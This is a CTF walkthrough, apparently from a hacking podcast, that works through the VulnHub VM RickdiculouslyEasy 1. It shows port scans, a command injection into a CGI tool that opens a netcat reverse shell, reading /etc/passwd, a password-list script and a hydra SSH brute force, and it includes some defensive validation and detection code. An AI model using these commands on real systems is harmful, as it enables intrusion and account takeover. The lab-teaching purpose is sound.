Episode 2: RickdiculouslyEasy 1

In this first real episode we take a look at RickdiculouslyEasy 1!

Hello and welcome to episode 2 of the Sudo Social Club. I’m Edward Miro and in this episode we are going to be taking a look at a boot2root from VulnHub called RickdiculouslyEasy 1.

The Sudo Social Club is a podcast and YouTube channel centered around hacking capture the flags, wargames, crypto-challenges and vulnerable VM’s. I will be recording videos of me completing the challenges and also explaining in detail what I’m doing, why I’m doing what I’m doing and as much information as I can fit into each episode. Each week I’ll be picking a vulnerable VM, challenge or CTF to work through with you. Together we will learn about all the techniques, protocols and workflows to hack all the things. I’m also going to maintain a really good reference page on www.sudosocialclub.com with links, a workflow cheat sheet with all the commands I used and a feed of all my past episodes for you to use anytime you need it.

If anyone has any feedback or recommendations on how I can improve the channel please leave a comment or email me at sudosocialclub@protonmail.com. Stay tuned after the main content for the Sudo Social Club crypto challenge of the week for a chance to get invited to our private Discord server!

Thanks for tuning in, now let’s begin:

As I mentioned in the introduction, this episode is a walkthrough of a boot2root from VulnHub called RickdiculouslyEasy 1. Even though last week’s episode on Metasploitable 2 was a legit demo of vulnerabilities, it is designed to be beyond easy because it’s not a challenge, but a testing platform. I do recommend everyone practice using Metasploitable, but it’s just to make sure all your tools are working and you understand the basics of hacking. From here on out when we look at challenges, they’ll be somewhat harder. That being said, RickdiculouslyEasy 1 isn’t crazy hard and it’s fun.

From the VulnHub page:

This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It's designed to be a beginner ctf, if you're new to pen testing, check it out!
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
https://www.vulnhub.com/author/luke,562/

As always we start with our housekeeping and prep:

apt-get update
apt-get upgrade
apt-get autoremove

We then check our Kali IP address:

ifconfig

We have an address of 192.168.56.4. Now I’m gonna run netdiscover and see what ARP gives us:

netdiscover -r 192.168.56.0/24

Pretty safe to assume it’s 192.168.56.5, but we are gonna run Nmap also to get a better picture of the target and network:

nmap -sn 192.168.56.0/24

Now we start digging deeper on our target system:

nmap -sS 192.168.56.5

So here are the results of this scan:

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

I know from my research on this challenge, that this scan isn’t giving up everything available. I’m also gonna run:

nmap -p- -sV 192.168.56.5

This one will take a bit longer, so while it’s running I’m gonna explain the difference between those two scans. The Nmap man page explains the -sS option as:

SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls. SYN scan is relatively unobtrusive and stealthy, since it never completes TCP connections. It also works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap's FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between open, closed, and filtered states. 

It’s also the Nmap default so putting the -sS in is unnecessary, but I’ve been doing it to make sure we are fully understanding what’s going on.

For the second scan, the -p- tells Nmap to scan every port from 1 through 65535 and -sV has it probe all open ports and try to determine what services and versions are running. You get way more information this way. The default scan only hits the 1000 most popular ports.

Now we have much more:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown

Let’s first check out those http services running on port 80 and 9090 with our browser and see what’s up:

192.168.56.5:80

So here we have Morty’s Cool Website. Checking the source doesn’t show anything. I’ll also check robots.txt and now we’re getting somewhere:

They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

Checking the root_shell.cgi:

--UNDER CONSTRUCTION-- 

Viewing the source:

<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->

Nice little red herring for us. Next the tracertool.cgi: 

MORTY'S MACHINE TRACER MACHINE 
Enter an IP address to trace. 

Let’s see if command injection works. I start by getting netcat listening on my Kali machine:

nc -lvp 4444

Then I inject the following command into the tracer tool:

127.0.0.1; nc -e /bin/sh 192.168.56.4 4444

Awesome, we’re in. Looking around in our reverse shell gives us a few things. There’s a passwords folder served by the web server with a couple of files we can check out. I tried to cat them, but apparently Rick aliased the cat command to output a little ASCII cat for us, so instead we’ll pop them into the browser. The first one is a flag:
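The tracer tool falls to the classic command injection pattern: whatever is typed into the "IP address" field is handed to a shell, so `;` ends the traceroute command and starts a second one. The following is an added example, not code from the episode or from the VM, showing the vulnerable string-building pattern beside the hardened version a defender would ship (strict parse with `ipaddress`, then `subprocess.run` with an argument list so no shell ever sees the input) plus a small detection helper for log review. `traceroute -n` and the `SHELL_META` character set are my assumptions; the injected string is the one used in the walkthrough, reused only as a test input.

```python
import ipaddress
import re
import subprocess

# The payload the walkthrough typed into the tracer tool, reused here only as a
# test input for the validator below.
INJECTED_INPUT = "127.0.0.1; nc -e /bin/sh 192.168.56.4 4444"

# Characters that change how a shell parses a command line (assumed set). Useful
# for log review and WAF rules, not as the primary defence; that is the strict
# parse in validate_ip().
SHELL_META = re.compile(r"[;&|`$<>\\\n(){}]")


def build_shell_command(user_input: str) -> str:
    """Vulnerable pattern (assumed to be what tracertool.cgi does): the user's
    text is glued into a string that /bin/sh will parse. Returned as a string,
    never executed here."""
    return "traceroute " + user_input


def validate_ip(user_input: str) -> str:
    """Hardened: the only acceptable input is a syntactically valid IP address.
    ipaddress.ip_address() raises ValueError on anything else, including
    '127.0.0.1; ...', so the injection never reaches a command line."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        raise ValueError(f"rejected tracer input: {user_input!r}") from None


def build_argv(user_input: str) -> list:
    """Argument vector for subprocess.run(..., shell=False): no shell parses the
    input, and the validated address cannot be anything but an address."""
    return ["traceroute", "-n", validate_ip(user_input)]


def looks_like_injection(user_input: str) -> bool:
    """Detection helper: a field that should hold an IP address but contains
    shell metacharacters is worth an alert in the web server's request logs."""
    return SHELL_META.search(user_input) is not None


def run_trace(user_input: str, timeout: int = 30) -> subprocess.CompletedProcess:
    """Execute the hardened version. Needs traceroute installed on the host."""
    return subprocess.run(build_argv(user_input), capture_output=True,
                          text=True, timeout=timeout)


if __name__ == "__main__":
    print("shell would run:", build_shell_command(INJECTED_INPUT))
    print("injection-looking:", looks_like_injection(INJECTED_INPUT))
    try:
        build_argv(INJECTED_INPUT)
    except ValueError as exc:
        print("hardened version:", exc)
    print("argv for a clean address:", build_argv("127.0.0.1"))
```

The important design choice is that the fix is not a blacklist: `looks_like_injection` exists for detection only, while `validate_ip` accepts exactly one shape of input and everything else is an error.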

http://192.168.56.5/passwords/FLAG.txt

FLAG{Yeah d- just don't do it.} - 10 Points	10/130

And the second is a funny little webpage:

http://192.168.56.5/passwords/passwords.html

Viewing the source gives us a nice little hint for later:

<!--Password: winter-->

Since we know we can’t cat the passwd file without being trolled I can instead just use grep:

grep '[a-zA-Z0-9]' /etc/passwd

That gets us what we want and the notable accounts are:

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

Not hard to imagine which account that password we found before belongs to. Let’s exit this shell and check out the other http service running on port 9090:

https://192.168.56.5:9090/

FLAG {There is no Zeus, in your face!} - 10 Points	20/130

Awesome. 20 points down, 110 to go. Next let’s take a look at SSH and try to use the credentials we found:

ssh Summer@192.168.56.5 -p 22222
winter

Here we find another flag, but of course we can’t cat it like before so again we use grep:

grep '[a-zA-Z0-9]' FLAG.txt

FLAG{Get off the high road Summer!} - 10 Points	   30/130

We are also gonna poke around the /home/ directory and see what Summer has access to. Morty’s directory has a couple of files that I’m gonna snag:

scp -P 22222 Summer@192.168.56.5:/home/Morty/Safe_Password.jpg .
scp -P 22222 Summer@192.168.56.5:/home/Morty/journal.txt.zip .

Looking at the JPG doesn’t give us anything useful, but checking the EXIF using strings does:

strings Safe_Password.jpg 

The Safe Password: File: 
/home/Morty/journal.txt.zip. Password: Meeseek
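`strings` found that note because it sits in one of the JPEG's metadata segments, which are plain length-prefixed blocks before any image data. As an added example (not from the episode, and not the real Safe_Password.jpg), here is a small JPEG segment walker that pulls out COM (comment) segments and reports whether an Exif APP1 block exists; the sample image is constructed in the block and carries the same text the walkthrough recovered. Whether the real file kept the note in a COM segment or inside Exif is my assumption; the parser finds it in either case because both are walked.

```python
import struct

# Constructed sample text, mirroring the `strings` output from the walkthrough.
SAMPLE_COMMENT = "The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek"


def build_sample_jpeg(comment: str) -> bytes:
    """Assemble SOI + APP0(JFIF) + COM + EOI. No image data is needed for the demo."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", len(jfif) + 2) + jfif
    body = comment.encode("ascii")
    com = b"\xff\xfe" + struct.pack(">H", len(body) + 2) + body
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each header segment until SOS or EOI.

    Every segment is 0xFF <marker> <2-byte big-endian length incl. itself>
    <payload>, except stand-alone markers (TEM, RSTn) which carry no length.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        # Any number of 0xFF fill bytes may precede the marker code.
        while data[pos + 1] == 0xFF:
            pos += 1
            if pos + 2 > len(data):
                raise ValueError("truncated marker")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS: entropy-coded data follows
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # stand-alone markers
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def jpeg_comments(data: bytes):
    """Text of every COM (0xFE) segment; readable notes usually live here."""
    return [payload.decode("latin-1")
            for marker, payload in jpeg_segments(data) if marker == 0xFE]


def has_exif(data: bytes) -> bool:
    """True if an APP1 (0xE1) segment with the Exif header is present."""
    return any(marker == 0xE1 and payload.startswith(b"Exif\x00\x00")
               for marker, payload in jpeg_segments(data))


if __name__ == "__main__":
    sample = build_sample_jpeg(SAMPLE_COMMENT)
    print("comments:", jpeg_comments(sample))
    print("exif present:", has_exif(sample))
```

The length checks matter: a segment whose declared length runs past the end of the file is rejected instead of silently read, which is the kind of edge case a parser run over untrusted uploads has to handle.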

Now let’s try to unzip and cat that journal.txt:

unzip journal.txt.zip 
cat journal.txt

Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points		50/130

Heading over to Rick’s home directory has a couple interesting folders:

RICKS_SAFE
ThisDoesntContainAnyFlags

Checking in RICKS_SAFE shows his ‘safe’ binary, but Summer only has read permission on it, not execute, so we copy it to a tmp folder and run it from there:

./safe

Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

Oops, forgot the password from the previous flag:

./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points		70/130

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.

I Googled “Rick Sanchez Band” and found it’s “The Flesh Curtains”.

I also cheated and looked up how to make a Python script for this:

touch password.py
vim password.py

# Generate every candidate matching the hints: one uppercase letter,
# one digit, then one of the words from the band name.
from string import ascii_uppercase
for c in ascii_uppercase:
    for x in range(0, 10):
        print(c + str(x) + "Flesh")
        print(c + str(x) + "Curtains")

python password.py > password.txt
cat password.txt

Then I used hydra to brute force Rick’s SSH password:

hydra -s 22222 -v -V -l RickSanchez -P password.txt -t 16 192.168.56.5 ssh

This took a long time so to save you the wait here is the successful output:

[22222][ssh] host: 192.168.56.5   login: RickSanchez   password: P7Curtains
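A run like that is noisy on the server side: every guess hydra sends lands in the sshd auth log as a failed password, followed by a successful login from the same address. As an added example, not part of the episode, here is a small detector over constructed sshd log lines (made up for this block, not from the VM) that flags a source IP with a burst of failures inside a sliding window and records the first successful login from that IP afterwards, which is the signal a defender would want to alert on. The threshold of 5 failures per 60 seconds is an assumption; tune it to your environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log excerpt in syslog format (no year). Made up for the
# example; these are not lines from the RickdiculouslyEasy VM.
SAMPLE_AUTH_LOG = """\
Feb 28 21:14:01 rickvm sshd[2101]: Failed password for RickSanchez from 192.168.56.4 port 40101 ssh2
Feb 28 21:14:01 rickvm sshd[2102]: Failed password for RickSanchez from 192.168.56.4 port 40102 ssh2
Feb 28 21:14:02 rickvm sshd[2103]: Failed password for RickSanchez from 192.168.56.4 port 40103 ssh2
Feb 28 21:14:02 rickvm sshd[2104]: Failed password for RickSanchez from 192.168.56.4 port 40104 ssh2
Feb 28 21:14:03 rickvm sshd[2105]: Failed password for RickSanchez from 192.168.56.4 port 40105 ssh2
Feb 28 21:14:03 rickvm sshd[2106]: Failed password for RickSanchez from 192.168.56.4 port 40106 ssh2
Feb 28 21:14:04 rickvm sshd[2107]: Accepted password for RickSanchez from 192.168.56.4 port 40107 ssh2
Feb 28 21:20:00 rickvm sshd[2150]: Failed password for invalid user admin from 192.168.56.7 port 50001 ssh2
Feb 28 21:30:00 rickvm sshd[2200]: Accepted publickey for Morty from 192.168.56.10 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_line(line: str):
    """Return a dict for an sshd auth outcome line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # Syslog timestamps carry no year; strptime defaults to 1900, fine for deltas.
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Flag source IPs with >= threshold failures inside a sliding window and
    record the first successful login from such an IP (a likely guessed credential)."""
    recent = defaultdict(deque)        # ip -> failure timestamps inside the window
    total_failures = defaultdict(int)  # ip -> all failures seen
    users_tried = defaultdict(set)     # ip -> usernames attempted
    findings = {}                      # ip -> finding dict
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            total_failures[ip] += 1
            users_tried[ip].add(ev["user"])
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in findings:
                findings[ip] = {"ip": ip, "first_seen": q[0], "success": None}
        elif ip in findings and findings[ip]["success"] is None:
            findings[ip]["success"] = (ev["user"], ts)
    for ip, f in findings.items():
        f["failures"] = total_failures[ip]
        f["users"] = users_tried[ip]
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f)
```

Tools like fail2ban implement the same idea as a ban rule; the useful part here is the second half, tying a later "Accepted" to the burst so the alert reads as a probable compromise rather than just noise. Moving SSH to 22222, as this VM does, hides nothing from a full port scan and does nothing to this log pattern.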

Now we can login as Rick and see what he has:

ssh RickSanchez@192.168.56.5 -p 22222

I forgot about that folder ThisDoesntContainAnyFlags and it does have a file in it:

NotAFlag.txt

Running grep reveals Rick is not a liar:

grep '[a-zA-Z0-9]' NotAFlag.txt 

hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..

Assuming Rick has sudo permissions we can pop over into the interactive root shell and see if there’s anything there:

sudo -i

Yep. FLAG.txt

grep '[a-zA-Z0-9]' FLAG.txt

FLAG: {Ionic Defibrillator} - 30 points		100/130

Now let’s go check out those last 3 services we found in our initial scan:

nc 192.168.56.5 13337

FLAG:{TheyFoundMyBackDoorMorty}-10Points		110/130

nc 192.168.56.5 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt

FLAG{Flip the pickle Morty!} - 10 Points 		120/130

Back to the browser:

ftp://192.168.56.5/

FLAG.txt

FLAG{Whoa this is unexpected} - 10 Points		130/130

Well, that’s all 130 points and this challenge is done. I know I learned a few things with this one and hopefully you did too.

If you want to attempt this week’s challenge, go to www.sudosocialclub.com, click on this week’s episode and scroll to the bottom for the cipher text. If you think you solved it, send me an email at sudosocialclub@protonmail.com and I’ll invite you to join our Discord server so you can chat with me and other listeners like yourself.

d95679752134a2d9eb61dbd7b91c4bcc
d95679752134a2d9eb61dbd7b91c4bcc
e358efa489f58062f10dd7316b65649e
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
d95679752134a2d9eb61dbd7b91c4bcc
d95679752134a2d9eb61dbd7b91c4bcc
e358efa489f58062f10dd7316b65649e
0cc175b9c0f1b6a831c399e269772661
03c7c0ace395d80182db07ae2c30f034
d95679752134a2d9eb61dbd7b91c4bcc
2db95e8e1a9267b7a1188556b2013b33
d95679752134a2d9eb61dbd7b91c4bcc
d1457b72c3fb323a2671125aef3eab5d

If you like this week’s episode and want to help support this channel please subscribe to the podcast through whatever podcatcher you found me through and please subscribe to the YouTube channel. Links to everything on www.sudosocialclub.com, including transcripts, and if you want to help the channel grow please share on your social media. Once again I’m Edward Miro and you can contact me at sudosocialclub@protonmail.com with any comments, questions, corrections or feedback including ideas for future episodes. Thanks for checking out the Sudo Social Club. Have a great week!

Commands:

apt-get update
apt-get upgrade
apt-get autoremove
ifconfig
netdiscover -r 192.168.56.0/24
nmap -sn 192.168.56.0/24
nmap -sS 192.168.56.5
nmap -p- -sV 192.168.56.5
192.168.56.5:80
192.168.56.5:80/robots.txt
192.168.56.5:80/cgi-bin/root_shell.cgi
192.168.56.5:80/cgi-bin/tracertool.cgi
nc -lvp 4444
127.0.0.1; nc -e /bin/sh 192.168.56.4 4444
http://192.168.56.5/passwords/FLAG.txt
http://192.168.56.5/passwords/passwords.html
grep '[a-zA-Z0-9]' /etc/passwd
https://192.168.56.5:9090/
ssh Summer@192.168.56.5 -p 22222
grep '[a-zA-Z0-9]' FLAG.txt
scp -P 22222 Summer@192.168.56.5:/home/Morty/Safe_Password.jpg .
scp -P 22222 Summer@192.168.56.5:/home/Morty/journal.txt.zip .
strings Safe_Password.jpg 
unzip journal.txt.zip 
cat journal.txt
./safe
./safe 131333
touch password.py
vim password.py
from string import ascii_uppercase
for c in ascii_uppercase:
    for x in range(0, 10):
        print(c + str(x) + "Flesh")
        print(c + str(x) + "Curtains")
python password.py > password.txt
cat password.txt
hydra -s 22222 -v -V -l RickSanchez -P password.txt -t 16 192.168.56.5 ssh
grep '[a-zA-Z0-9]' NotAFlag.txt 
sudo -i
nc 192.168.56.5 13337
nc 192.168.56.5 60000
ftp://192.168.56.5/
Written on February 28, 2019